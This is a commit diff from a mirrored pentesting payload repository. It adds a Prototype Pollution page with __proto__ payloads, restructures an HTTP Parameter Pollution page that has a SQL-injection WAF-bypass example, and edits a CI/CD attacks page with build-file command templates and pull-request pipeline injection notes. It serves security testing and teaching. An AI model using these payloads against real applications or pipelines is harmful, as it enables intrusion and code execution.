mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 07:04:22 +00:00
Prototype Pollution
This commit is contained in:
parent
0a75beeccd
commit
86e246dd03
4 changed files with 103 additions and 15 deletions
|
@ -10,6 +10,7 @@
|
||||||
|
|
||||||
- [CI/CD attacks](#cicd-attacks)
|
- [CI/CD attacks](#cicd-attacks)
|
||||||
- [Summary](#summary)
|
- [Summary](#summary)
|
||||||
|
- [Tools](#tools)
|
||||||
- [Package managers & Build Files](#package-managers--build-files)
|
- [Package managers & Build Files](#package-managers--build-files)
|
||||||
- [Javascript / Typescript - package.json](#javascript--typescript---packagejson)
|
- [Javascript / Typescript - package.json](#javascript--typescript---packagejson)
|
||||||
- [Python - setup.py](#python---setuppy)
|
- [Python - setup.py](#python---setuppy)
|
||||||
|
@ -28,6 +29,9 @@
|
||||||
- [References](#references)
|
- [References](#references)
|
||||||
|
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
|
||||||
|
* [praetorian-inc/gato](https://github.com/praetorian-inc/gato) - GitHub Self-Hosted Runner Enumeration and Attack Tool
|
||||||
|
|
||||||
## Package managers & Build Files
|
## Package managers & Build Files
|
||||||
|
|
||||||
|
@ -144,8 +148,6 @@ NOTE: remember that your payload is inserted in an XML document - XML special ch
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
### BUILD.bazel
|
### BUILD.bazel
|
||||||
|
|
||||||
> Replace the content of `BUILD.bazel` with the following payload
|
> Replace the content of `BUILD.bazel` with the following payload
|
||||||
|
@ -184,14 +186,12 @@ default:
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
### Rakefile
|
### Rakefile
|
||||||
|
|
||||||
> Rake files are similar to `Makefile` but for Ruby projects.\
|
> Rake files are similar to `Makefile` but for Ruby projects.\
|
||||||
> Replace your target `Rakefile` with the following payload
|
> Replace your target `Rakefile` with the following payload
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
```shell
|
```shell
|
||||||
task :pre_task do
|
task :pre_task do
|
||||||
sh "{Payload}"
|
sh "{Payload}"
|
||||||
|
@ -213,7 +213,6 @@ task :default => [:build]
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
### C# - *.csproj
|
### C# - *.csproj
|
||||||
|
|
||||||
> `.csproj` files are build file for the `C#` runtime.\
|
> `.csproj` files are build file for the `C#` runtime.\
|
||||||
|
@ -232,14 +231,14 @@ NOTE: Since this is an XML file - XML special characters must be escaped.
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
## CI/CD products
|
## CI/CD products
|
||||||
|
|
||||||
### GitHub Actions
|
### GitHub Actions
|
||||||
|
|
||||||
The configuration files for GH actions are located in the directory `.github/workflows/`\
|
The configuration files for GH actions are located in the directory `.github/workflows/`\
|
||||||
You can tell if the action builds pull requests based on its trigger (`on`) instructions:
|
You can tell if the action builds pull requests based on its trigger (`on`) instructions:
|
||||||
```
|
|
||||||
|
```yaml
|
||||||
on:
|
on:
|
||||||
push:
|
push:
|
||||||
branches:
|
branches:
|
||||||
|
@ -250,7 +249,7 @@ on:
|
||||||
In order to run an OS command in an action that builds pull requests - simply add a `run` instruction to it.\
|
In order to run an OS command in an action that builds pull requests - simply add a `run` instruction to it.\
|
||||||
An action may also be vulnerable to command injection if it dynamically evaluates untrusted input as part of its `run` instruction:
|
An action may also be vulnerable to command injection if it dynamically evaluates untrusted input as part of its `run` instruction:
|
||||||
|
|
||||||
```
|
```yaml
|
||||||
jobs:
|
jobs:
|
||||||
print_issue_title:
|
print_issue_title:
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
@ -264,7 +263,8 @@ jobs:
|
||||||
|
|
||||||
The configuration files for azure pipelines are normally located in the root directory of the repository and called - `azure-pipelines.yml`\
|
The configuration files for azure pipelines are normally located in the root directory of the repository and called - `azure-pipelines.yml`\
|
||||||
You can tell if the pipeline builds pull requests based on its trigger instructions. Look for `pr:` instruction:
|
You can tell if the pipeline builds pull requests based on its trigger instructions. Look for `pr:` instruction:
|
||||||
```
|
|
||||||
|
```yaml
|
||||||
trigger:
|
trigger:
|
||||||
branches:
|
branches:
|
||||||
include:
|
include:
|
||||||
|
@ -281,7 +281,8 @@ The configuration files for CircleCI builds are located in `.circleci/config.yml
|
||||||
By default - CircleCI pipelines don't build forked pull requests. It's an opt-in feature that should be enabled by the pipeline owners.
|
By default - CircleCI pipelines don't build forked pull requests. It's an opt-in feature that should be enabled by the pipeline owners.
|
||||||
|
|
||||||
In order to run an OS command in a workflow that builds pull requests - simply add a `run` instruction to the step.
|
In order to run an OS command in a workflow that builds pull requests - simply add a `run` instruction to the step.
|
||||||
```
|
|
||||||
|
```yaml
|
||||||
jobs:
|
jobs:
|
||||||
build:
|
build:
|
||||||
docker:
|
docker:
|
||||||
|
@ -296,7 +297,8 @@ The configuration files for Drone builds are located in `.drone.yml`\
|
||||||
Drone build are often self-hosted, this means that you may gain excessive privileges to the kubernetes cluster that runs the runners, or to the hosting cloud environment.
|
Drone build are often self-hosted, this means that you may gain excessive privileges to the kubernetes cluster that runs the runners, or to the hosting cloud environment.
|
||||||
|
|
||||||
In order to run an OS command in a workflow that builds pull requests - simply add a `commands` instruction to the step.
|
In order to run an OS command in a workflow that builds pull requests - simply add a `commands` instruction to the step.
|
||||||
```
|
|
||||||
|
```yaml
|
||||||
steps:
|
steps:
|
||||||
- name: do-something
|
- name: do-something
|
||||||
image: some-image:3.9
|
image: some-image:3.9
|
||||||
|
@ -311,14 +313,14 @@ The configuration files for BuildKite builds are located in `.buildkite/*.yml`\
|
||||||
BuildKite build are often self-hosted, this means that you may gain excessive privileges to the kubernetes cluster that runs the runners, or to the hosting cloud environment.
|
BuildKite build are often self-hosted, this means that you may gain excessive privileges to the kubernetes cluster that runs the runners, or to the hosting cloud environment.
|
||||||
|
|
||||||
In order to run an OS command in a workflow that builds pull requests - simply add a `command` instruction to the step.
|
In order to run an OS command in a workflow that builds pull requests - simply add a `command` instruction to the step.
|
||||||
```
|
|
||||||
|
```yaml
|
||||||
steps:
|
steps:
|
||||||
- label: "Example Test"
|
- label: "Example Test"
|
||||||
command: echo "Hello!"
|
command: echo "Hello!"
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [Poisoned Pipeline Execution](https://www.cidersecurity.io/top-10-cicd-security-risks/poisoned-pipeline-execution-ppe/)
|
* [Poisoned Pipeline Execution](https://www.cidersecurity.io/top-10-cicd-security-risks/poisoned-pipeline-execution-ppe/)
|
||||||
|
|
|
@ -1,9 +1,13 @@
|
||||||
# HTTP Parameter Pollution
|
# HTTP Parameter Pollution
|
||||||
|
|
||||||
|
> HTTP Parameter Pollution (HPP) is a Web attack evasion technique that allows an attacker to craft a HTTP request in order to manipulate web logics or retrieve hidden information. This evasion technique is based on splitting an attack vector between multiple instances of a parameter with the same name (?param1=value¶m1=value). As there is no formal way of parsing HTTP parameters, individual web technologies have their own unique way of parsing and reading URL parameters with the same name. Some taking the first occurrence, some taking the last occurrence, and some reading it as an array. This behavior is abused by the attacker in order to bypass pattern-based security mechanisms.
|
||||||
|
|
||||||
## Summary
|
## Summary
|
||||||
|
|
||||||
HTTP Parameter Pollution (HPP) is a Web attack evasion technique that allows an attacker to craft a HTTP request in order to manipulate web logics or retrieve hidden information. This evasion technique is based on splitting an attack vector between multiple instances of a parameter with the same name (?param1=value¶m1=value). As there is no formal way of parsing HTTP parameters, individual web technologies have their own unique way of parsing and reading URL parameters with the same name. Some taking the first occurrence, some taking the last occurrence, and some reading it as an array. This behavior is abused by the attacker in order to bypass pattern-based security mechanisms.
|
* [Tools](#tools)
|
||||||
|
* [How to test](#how-to-test)
|
||||||
|
* [Table of reference](#table-of-reference)
|
||||||
|
* [References](#references)
|
||||||
|
|
||||||
|
|
||||||
## Tools
|
## Tools
|
||||||
|
@ -22,8 +26,10 @@ Origin Service - Reads second param. In this scenario, developer trusted WAF and
|
||||||
Attacker -- http://example.com?search=Beth&search=' OR 1=1;## --> WAF (reads first 'search' param, looks innocent. passes on) --> Origin Service (reads second 'search' param, injection happens if no checks are done here.)
|
Attacker -- http://example.com?search=Beth&search=' OR 1=1;## --> WAF (reads first 'search' param, looks innocent. passes on) --> Origin Service (reads second 'search' param, injection happens if no checks are done here.)
|
||||||
```
|
```
|
||||||
|
|
||||||
### Table of reference for which technology reads which parameter
|
### Table of reference
|
||||||
|
|
||||||
When ?par1=a&par1=b
|
When ?par1=a&par1=b
|
||||||
|
|
||||||
| Technology | Parsing Result |outcome (par1=)|
|
| Technology | Parsing Result |outcome (par1=)|
|
||||||
| ------------------ |--------------- |:-------------:|
|
| ------------------ |--------------- |:-------------:|
|
||||||
| ASP.NET/IIS |All occurrences |a,b |
|
| ASP.NET/IIS |All occurrences |a,b |
|
||||||
|
@ -44,7 +50,9 @@ When ?par1=a&par1=b
|
||||||
| Python/Zope |All occurrences in array |['a','b'] |
|
| Python/Zope |All occurrences in array |['a','b'] |
|
||||||
| Ruby on Rails |Last occurrence |b |
|
| Ruby on Rails |Last occurrence |b |
|
||||||
|
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
- [HTTP Parameter Pollution - Imperva](https://www.imperva.com/learn/application-security/http-parameter-pollution/)
|
- [HTTP Parameter Pollution - Imperva](https://www.imperva.com/learn/application-security/http-parameter-pollution/)
|
||||||
- [HTTP Parameter Pollution in 11 minutes | Web Hacking - PwnFunction](https://www.youtube.com/watch?v=QVZBl8yxVX0&ab_channel=PwnFunction)
|
- [HTTP Parameter Pollution in 11 minutes | Web Hacking - PwnFunction](https://www.youtube.com/watch?v=QVZBl8yxVX0&ab_channel=PwnFunction)
|
||||||
- [How to Detect HTTP Parameter Pollution Attacks - Acunetix](https://www.acunetix.com/blog/whitepaper-http-parameter-pollution/)
|
- [How to Detect HTTP Parameter Pollution Attacks - Acunetix](https://www.acunetix.com/blog/whitepaper-http-parameter-pollution/)
|
||||||
|
|
77
Prototype Pollution/README.md
Normal file
77
Prototype Pollution/README.md
Normal file
|
@ -0,0 +1,77 @@
|
||||||
|
# Prototype Pollution
|
||||||
|
|
||||||
|
> Prototype pollution is a type of vulnerability that occurs in JavaScript when properties of Object.prototype are modified. This is particularly risky because JavaScript objects are dynamic and we can add properties to them at any time. Also, almost all objects in JavaScript inherit from Object.prototype, making it a potential attack vector.
|
||||||
|
|
||||||
|
|
||||||
|
## Summary
|
||||||
|
|
||||||
|
* [Tools](#tools)
|
||||||
|
* [Labs](#labs)
|
||||||
|
* [Exploit](#exploit)
|
||||||
|
* [Examples](#examples)
|
||||||
|
* [Prototype pollution via JSON input](#prototype-pollution-via-json-input)
|
||||||
|
* [Prototype pollution payloads](#prototype-pollution-payloads)
|
||||||
|
* [References](#references)
|
||||||
|
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
|
||||||
|
* [yeswehack/pp-finder](https://github.com/yeswehack/pp-finder) - Help you find gadget for prototype pollution exploitation
|
||||||
|
|
||||||
|
|
||||||
|
## Labs
|
||||||
|
|
||||||
|
* [YesWeHack Dojo - Prototype Pollution](https://dojo-yeswehack.com/XSS/Training/Prototype-Pollution)
|
||||||
|
* [PortSwigger - Prototype pollution](https://portswigger.net/web-security/all-labs#prototype-pollution)
|
||||||
|
|
||||||
|
|
||||||
|
## Exploit
|
||||||
|
|
||||||
|
In JavaScript, prototypes are what allow objects to inherit features from other objects. If an attacker is able to add or modify properties of `Object.prototype`, they can essentially affect all objects that inherit from that prototype, potentially leading to various kinds of security risks.
|
||||||
|
|
||||||
|
|
||||||
|
### Examples
|
||||||
|
|
||||||
|
* Imagine that an application uses an object to maintain configuration settings, like this:
|
||||||
|
```js
|
||||||
|
let config = {
|
||||||
|
isAdmin: false
|
||||||
|
};
|
||||||
|
```
|
||||||
|
* An attacker might be able to add an `isAdmin` property to `Object.prototype`, like this:
|
||||||
|
```js
|
||||||
|
Object.prototype.isAdmin = true;
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### Prototype pollution via JSON input
|
||||||
|
|
||||||
|
You can access the prototype of any object via the magic property `__proto__`.
|
||||||
|
|
||||||
|
```js
|
||||||
|
{
|
||||||
|
"__proto__": {
|
||||||
|
"evilProperty": "evilPayload"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### Prototype pollution payloads
|
||||||
|
|
||||||
|
```js
|
||||||
|
Object.__proto__["evilProperty"]="evilPayload"
|
||||||
|
Object.__proto__.evilProperty="evilPayload"
|
||||||
|
Object.constructor.prototype.evilProperty="evilPayload"
|
||||||
|
Object.constructor["prototype"]["evilProperty"]="evilPayload"
|
||||||
|
{"__proto__": {"evilProperty": "evilPayload"}}
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [Server side prototype pollution, how to detect and exploit - YesWeHack](https://blog.yeswehack.com/talent-development/server-side-prototype-pollution-how-to-detect-and-exploit/)
|
||||||
|
* [Prototype Pollution - PortSwigger](https://portswigger.net/web-security/prototype-pollution)
|
||||||
|
* [A Pentester’s Guide to Prototype Pollution Attacks - HARSH BOTHRA - JAN 2, 2023](https://www.cobalt.io/blog/a-pentesters-guide-to-prototype-pollution-attacks)
|
||||||
|
* [Prototype pollution - Snyk](https://learn.snyk.io/lessons/prototype-pollution/javascript/)
|
||||||
|
* [NodeJS - __proto__ & prototype Pollution - HackTricks](https://book.hacktricks.xyz/pentesting-web/deserialization/nodejs-proto-prototype-pollution)
|
|
@ -106,3 +106,4 @@ CloudFlare has a list of default extensions that gets cached behind their Load B
|
||||||
- [Exploiting cache design flaws](https://portswigger.net/web-security/web-cache-poisoning/exploiting-design-flaws)
|
- [Exploiting cache design flaws](https://portswigger.net/web-security/web-cache-poisoning/exploiting-design-flaws)
|
||||||
- [Exploiting cache implementation flaws](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws)
|
- [Exploiting cache implementation flaws](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws)
|
||||||
* [OpenAI Account Takeover - @naglinagli - Mar 24, 2023](https://twitter.com/naglinagli/status/1639343866313601024)
|
* [OpenAI Account Takeover - @naglinagli - Mar 24, 2023](https://twitter.com/naglinagli/status/1639343866313601024)
|
||||||
|
* [Shockwave Identifies Web Cache Deception and Account Takeover Vulnerability affecting OpenAI's ChatGPT - Gal Nagli](https://www.shockwave.cloud/blog/shockwave-works-with-openai-to-fix-critical-chatgpt-vulnerability)
|
Loading…
Reference in a new issue